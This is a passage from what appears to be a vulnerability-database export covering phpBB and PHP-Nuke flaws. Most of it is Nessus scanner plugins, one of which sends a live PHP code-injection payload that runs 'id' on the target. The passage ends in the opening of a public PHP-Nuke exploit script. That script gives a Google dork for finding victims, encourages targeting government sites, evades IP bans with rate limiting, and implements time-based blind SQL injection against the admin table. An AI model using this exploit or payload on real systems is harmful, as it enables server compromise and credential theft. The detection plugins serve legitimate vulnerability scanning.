abuses\");\n script_dependencie(\"phpbb_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n# Check starts here\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\nkb = get_kb_item(\"www/\" + port + \"/phpBB\");\nif ( ! kb ) exit(0);\n\nmatches = eregmatch(pattern:\"(.*) under (.*)\", string:kb);\nversion = matches[1];\n\nif ( ereg(pattern:\"^([01]\\.|2\\.0\\.([0-9]|10)([^0-9]|$))\", string:version ) )\n{\n\tsecurity_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T13:26:24", "description": "The remote host is running a version of phpBB older than 2.0.11. It is\nreported that this version of phpBB is susceptible to a script\ninjection vulnerability which may allow an attacker to execute\narbitrary code on the remote host. In addition, phpBB has been\nreported to multiple SQL injections, although Nessus has not checked\nfor them.\n\nESMARKCONANT is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/14 by a group known as the Shadow\nBrokers.", "edition": 27, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2005-01-18T00:00:00", "title": "phpBB < 2.0.11 Multiple Vulnerabilities (ESMARKCONANT)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-1315"], "modified": "2005-01-18T00:00:00", "cpe": ["cpe:/a:phpbb_group:phpbb"], "id": "PHPBB_VIEWTOPIC_SCRIPT_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/16200", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(16200);\n script_version(\"1.21\");\n\n script_cve_id(\"CVE-2004-1315\");\n script_bugtraq_id(10701);\n script_xref(name:\"CERT\", value:\"497400\");\n script_xref(name:\"EDB-ID\", value:\"647\");\n\n script_name(english:\"phpBB < 2.0.11 Multiple Vulnerabilities (ESMARKCONANT)\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code may be run on the remote server.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of phpBB older than 2.0.11. It is\nreported that this version of phpBB is susceptible to a script\ninjection vulnerability which may allow an attacker to execute\narbitrary code on the remote host. In addition, phpBB has been\nreported to multiple SQL injections, although Nessus has not checked\nfor them.\n\nESMARKCONANT is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/14 by a group known as the Shadow\nBrokers.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to phpBB 2.0.11 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpBB viewtopic.php Arbitrary Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/01/18\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2004/11/12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_summary(english:\"Check for the version of phpBB\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"CGI abuses\");\n script_dependencie(\"phpbb_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n# Check starts here\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\nkb = get_kb_item(\"www/\" + port + \"/phpBB\");\nif ( ! kb ) exit(0);\nmatches = eregmatch(pattern:\"(.*) under (.*)\", string:kb);\n\nversion = matches[1];\nif ( ereg(pattern:\"^([01]\\..*|2\\.0\\.([0-9]|1[01])[^0-9])\", string:version))\n\tsecurity_hole(port);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:43:05", "description": "FrSIRT Advisory reports :\n\nA vulnerability was identified in phpBB, which may be exploited by\nattackers to compromise a vulnerable web server. This flaw is due to\nan input validation error in the 'viewtopic.php' script that does not\nproperly filter the 'highlight' parameter before calling the\n'preg_replace()' function, which may be exploited by remote attackers\nto execute arbitrary PHP commands with the privileges of the web\nserver.", "edition": 29, "published": "2005-07-13T00:00:00", "title": "FreeBSD : phpbb -- remote PHP code execution vulnerability (4afacca1-eb9d-11d9-a8bd-000cf18bbe54)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2086"], "modified": "2005-07-13T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:phpbb"], "id": "FREEBSD_PKG_4AFACCA1EB9D11D9A8BD000CF18BBE54.NASL", "href": "https://www.tenable.com/plugins/nessus/18928", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18928);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-2086\");\n\n script_name(english:\"FreeBSD : phpbb -- remote PHP code execution vulnerability (4afacca1-eb9d-11d9-a8bd-000cf18bbe54)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"FrSIRT Advisory reports :\n\nA vulnerability was identified in phpBB, which may be exploited by\nattackers to compromise a vulnerable web server. This flaw is due to\nan input validation error in the 'viewtopic.php' script that does not\nproperly filter the 'highlight' parameter before calling the\n'preg_replace()' function, which may be exploited by remote attackers\nto execute arbitrary PHP commands with the privileges of the web\nserver.\"\n );\n # http://www.frsirt.com/english/advisories/2005/0904\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.frsirt.com\"\n );\n # http://www.phpbb.com/phpBB/viewtopic.php?t=302011\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpbb.com/community/viewtopic.php?t=302011\"\n );\n # https://vuxml.freebsd.org/freebsd/4afacca1-eb9d-11d9-a8bd-000cf18bbe54.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?133658fa\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Phpbb RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpBB viewtopic.php Arbitrary Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpbb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/06/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpbb<2.0.16\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:51:57", "description": "The remote host is affected by the vulnerability described in GLSA-200507-03\n(phpBB: Arbitrary command execution)\n\n Ron van Daal discovered that phpBB contains a vulnerability in the\n highlighting code.\n \nImpact :\n\n Successful exploitation would grant an attacker unrestricted access to\n the PHP exec() or system() functions, allowing the execution of\n arbitrary commands with the rights of the web server.\n \nWorkaround :\n\n Please follow the instructions given in the phpBB announcement.", "edition": 29, "published": "2005-07-05T00:00:00", "title": "GLSA-200507-03 : phpBB: Arbitrary command execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2086"], "modified": "2005-07-05T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:phpBB"], "id": "GENTOO_GLSA-200507-03.NASL", "href": "https://www.tenable.com/plugins/nessus/18607", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200507-03.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18607);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-2086\");\n script_xref(name:\"GLSA\", value:\"200507-03\");\n\n script_name(english:\"GLSA-200507-03 : phpBB: Arbitrary command execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200507-03\n(phpBB: Arbitrary command execution)\n\n Ron van Daal discovered that phpBB contains a vulnerability in the\n highlighting code.\n \nImpact :\n\n Successful exploitation would grant an attacker unrestricted access to\n the PHP exec() or system() functions, allowing the execution of\n arbitrary commands with the rights of the web server.\n \nWorkaround :\n\n Please follow the instructions given in the phpBB announcement.\"\n );\n # http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=302011\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpbb.com/community/viewtopic.php?f=14&t=302011\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200507-03\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"The phpBB package is no longer supported by Gentoo Linux and has been\n masked in the Portage repository, no further announcements will be\n issued regarding phpBB updates. Users who wish to continue using phpBB\n are advised to monitor and refer to www.phpbb.com for more information.\n To continue using the Gentoo-provided phpBB package, please refer to\n the Portage documentation on unmasking packages and upgrade to 2.0.16.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Phpbb RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpBB viewtopic.php Arbitrary Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:phpBB\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/07/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-apps/phpBB\", unaffected:make_list(\"ge 2.0.16\"), vulnerable:make_list(\"lt 2.0.16\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpBB\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T13:26:23", "description": "The remote host is running a version of phpBB that allows attackers to\ninject arbitrary PHP code to the 'viewtopic.php' script to be executed\nsubject to the privileges of the web server userid.", "edition": 28, "published": "2005-06-29T00:00:00", "title": "phpBB < 2.0.16 viewtopic.php Highlighting Feature Arbitrary PHP Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2086"], "modified": "2005-06-29T00:00:00", "cpe": ["cpe:/a:phpbb_group:phpbb"], "id": "PHPBB_2_0_15.NASL", "href": "https://www.tenable.com/plugins/nessus/18589", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description) {\n script_id(18589);\n script_version(\"1.27\");\n\n script_cve_id(\"CVE-2005-2086\");\n script_bugtraq_id(14086);\n\n script_name(english:\"phpBB < 2.0.16 viewtopic.php Highlighting Feature Arbitrary PHP Code Execution\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is affected by a code\ninjection vulnerability.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of phpBB that allows attackers to\ninject arbitrary PHP code to the 'viewtopic.php' script to be executed\nsubject to the privileges of the web server userid.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/403631/30/0/threaded\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to phpBB version 2.0.16 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Phpbb RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpBB viewtopic.php Arbitrary Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/06/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2005/06/28\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/06/28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n summary[\"english\"] = \"Checks for remote code execution vulnerability in phpBB <= 2.0.15\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n ver = matches[1];\n dir = matches[2];\n\n # First we need a forum number.\n r = http_send_recv3(method:\"GET\", item:string(dir, \"/index.php\"), port:port);\n if (isnull(r)) exit(0);\n res = r[2];\n\n pat = '<a href=\"viewforum\\\\.php\\\\?f=([0-9]+)';\n matches = egrep(pattern:pat, string:res, icase:TRUE);\n if (matches) {\n foreach match (split(matches)) {\n match = chomp(match);\n forum = eregmatch(pattern:pat, string:match);\n if (!isnull(forum)) {\n forum = forum[1];\n break;\n }\n }\n }\n\n if (isnull(forum)) {\n debug_print(\"couldn't find a forum to use!\", level:1);\n }\n else {\n # Next we need a topic number.\n r = http_send_recv3(method:\"GET\",\n item:string(\n dir, \"/viewforum.php?\",\n \"f=\", forum\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n pat = '<a href=\"viewtopic\\\\.php\\\\?t=([0-9]+)';\n matches = egrep(pattern:pat, string:res, icase:TRUE);\n if (matches) {\n foreach match (split(matches)) {\n match = chomp(match);\n topic = eregmatch(pattern:pat, string:match);\n if (!isnull(topic)) {\n topic = topic[1];\n break;\n }\n }\n }\n\n if (isnull(topic)) {\n debug_print(\"couldn't find a topic to use!\", level:1);\n }\n else {\n # Finally, we can try to exploit the flaw.\n # exploit method comes from public exploit released by dab@digitalsec.net\n u = string(dir, \"/viewtopic.php?\", \"t=\", topic, \"&\", \"highlight='.system(getenv(HTTP_PHP)).'\");\n r = http_send_recv3(method: \"GET\", version: 11, item: u, port: port,\n \tadd_headers: make_array(\"PHP\", \"id\") );\n if (isnull(r)) exit(0);\n res = r[2];\n\n line = egrep(pattern:\"uid=[0-9]+.*gid=[0-9]+.*\", string:res);\n if (line)\n {\n report = string(\n \"Nessus was able to execute the command 'id' on the remote host,\\n\",\n \"which produced the following output :\\n\",\n \"\\n\",\n data_protection::sanitize_uid(output:line)\n );\n security_hole(port:port, extra:report);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T16:15:57", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "PHP-Nuke 7.0/8.1/8.1.35 - Wormable Remote Code Execution", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-1315"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-68531", "id": "SSV:68531", "sourceData": "\n #!/usr/bin/php\r\n<?php\r\n/*******************************************************************************\r\nWormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35(newist as of release)\r\nVendor's Website:http://phpnuke.org/\r\nSecuirty Researcher: Michael Brooks (https://sitewat.ch)\r\nOriginal Advisory: http://blog.sitewat.ch/2010/05/vulnerabilities-in-php-nuke.html\r\n\r\nGoogle hack:\r\n"Francisco Burzi" "Page Generation:" Seconds inurl:modules.php\r\n1,170,000 results\r\nadd inurl:gov to the google hack if you want to make the news ;)\r\nWorks with maigic_quotes_gpc=On or Off\r\nWorks with AppArmor and Suhosin Hadend-PHP, tested on Ubuntu 9.04 and 10.04\r\nMy own LFI+SQLI attack is used to bypass AppArmor!\r\nAlso tested XAMPP on Windows XP\r\nAll tests where done with MySQL5 and PHP5\r\nTo obtain a user's cookie:\r\n1) Register a normal account\r\n2) Login\r\n3) Type this into the same address bar and hit enter: javascript:document.cookie\r\nTo set a cookie you can do use this: javascript:document.cookie="admin=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2"\r\n*******************************************************************************/\r\nset_time_limit(0);\r\n//The blind_sql_injeciton calss is a general exploit framework that we are inheriting.\r\nclass php_nuke_blind_sql_injection extends blind_sql_injection {\r\n //This is the blind sql injection request.\r\n function query($check){\r\n //Rate limiter to bypass ipban.php's protection.\r\n //Must stay below 5 requests every 2 seconds.\r\n if(!($this->request_count%4)){\r\n sleep(2);\r\n }\r\n //build the http request to Inject a query:\r\n //This is a simple get request with a custom referer\r\n\t //$this->set_referer("'="/\\*" (select ".$check." from nuke_authors limit 1))-- */");\r\n $this->set_referer("'=(select ".$check." from nuke_authors limit 1))-- 1");\r\n /*example get and post request.\r\n *$this->set_get("id=1 or (select ".$check." from nuke_authors limit 1))";//$_GET[id]\r\n *$this->set_post("id=1 or (select ".$check." from nuke_authors limit 1))");//$_POST[id]\r\n */\r\n }\r\n}\r\n//This is a very efficient blind sql injection class. \r\nclass blind_sql_injection{\r\n var $url, $backup_url, $result, $http, $request_count, $timeout;\r\n function blind_sql_injection($url,$timeout=10){\r\n $this->request_count=0;\r\n $this->url=$url;\r\n $this->backup_url=$url;\r\n $this->http=new http_client();\r\n $this->timeout=$timeout;\r\n }\r\n function set_get($get){\r\n $this->url=$this->url."?".$get;\r\n }\r\n function set_referer($referer){\r\n $this->http->referer=$referer;\r\n }\r\n function set_post($post){\r\n $this->http->postdata=$post;\r\n }\r\n function test_target(){\r\n return $this->send("if(true,sleep(".$this->timeout."),0)")&&!$this->send("if(false,sleep(".$this->timeout."),0)");\r\n }\r\n function num_to_hex($arr){\r\n $ret='';\r\n foreach($arr as $a){\r\n if($a<=9){\r\n $ret.=$a;\r\n }else{\r\n $ret.=chr(87+$a);\r\n }\r\n }\r\n return $ret;\r\n }\r\n //Looking for a string of length 32 and base 16 in ascii chars.\r\n function find_md5($column){\r\n return $this->num_to_hex($this->bin_finder(16,32,"conv(substring($column,%s,1),16,10)"));\r\n }\r\n function find_sha1($column){\r\n return $this->num_to_hex($this->bin_finder(16,40,"conv(substring($column,%s,1),16,10)"));\r\n }\r\n //Look for an ascii string of arbitrary length.\r\n function find_string($column){\r\n $ret='';\r\n //A length of zero means we are looking for a null byte terminated string.\r\n $result=$this->bin_finder(128,0,"ascii(substring($column,%s,1))");\r\n foreach($result as $r){\r\n $ret.=chr($r);\r\n }\r\n return $ret;\r\n }\r\n //query() is a method that generates the sql injection request\r\n function query($check){\r\n //This function must be overridden.\r\n }\r\n function recheck($result,$question,$base){\r\n $this->bin_finder($base,1,$question,$start);\r\n //Force a long timeout.\r\n $tmp_timeout=$this->timeout;\r\n if($this->timeout<10){\r\n $this->timeout=10;\r\n }else{\r\n $this->timeout=$this->timeout*2;\r\n }\r\n $l=1;\r\n foreach($result as $r){\r\n if($this->send("if(".sprintf($question,$l)."!=".$r.",sleep(".$this->timeout."),0)")){\r\n $result[]=$b;\r\n break;\r\n }\r\n $l++;\r\n }\r\n $this->timeout=$tmp_timeout;\r\n }\r\n function linear_finder($base,$length,$question){\r\n for($l=1;$l<=$length;$l++){\r\n for($b=0;$b<$base;$b++){\r\n if($this->send("if(".sprintf($question,$l)."=".$b.",sleep(".$this->timeout."),0)")){\r\n $result[]=$b;\r\n break;\r\n }\r\n }\r\n }\r\n }\r\n #Binary search for mysql based sql injection.\r\n function bin_finder($base,$length,$question){\r\n $start_pos=1;\r\n $result='';\r\n for($cur=$start_pos;$cur<=$length||$length==0;$cur++){\r\n $n=$base-1;\r\n $low=0;\r\n $floor=$low;\r\n $high=$n-1;\r\n $pos= $low+(($high-$low)/2);\r\n $found=false;\r\n while($low<=$high&&!$found){\r\n #asking the sql database if the current value is greater than $pos\r\n if($this->send("if(greatest(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)")){\r\n #if this is true then the value must be the modulus.\r\n if($pos==$n-1){\r\n $result[]=$pos+1;\r\n $found=true;\r\n }else{\r\n $low=$pos+1;\r\n }\r\n #asking the sql database if the current value is less than $pos\r\n }else if($this->send("if(least(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)")){\r\n #if this is true the value must be zero, or in the case of ascii, a null byte.\r\n if($pos==$floor+1){\r\n $found=true;\r\n #We have found the null terminator so we have finnished our search for a string.\r\n if($length==0){\r\n $length=-1;\r\n }else{\r\n $result[]=$pos-1;\r\n }\r\n }else{\r\n $high=$pos-1;\r\n }\r\n }else{\r\n #both greater than and less then where asked, so so then the answer is our guess $pos.\r\n $result[]=$pos;\r\n $found=true;\r\n }\r\n $pos=$low+(($high-$low)/2);\r\n }\r\n print(".");\r\n }\r\n return $result;\r\n }\r\n //Fire off the request\r\n function send($quesiton){\r\n //build the injected query.\r\n $this->query($quesiton);\r\n $start=time();\r\n $resp=$this->http->send($this->url);\r\n //backup_url is for set_get()\r\n $this->url=$this->backup_url;\r\n $this->request_count++;\r\n return (time()-$start>=$this->timeout);\r\n }\r\n //retroGod RIP\r\n function charEncode($string){\r\n $char="char(";\r\n 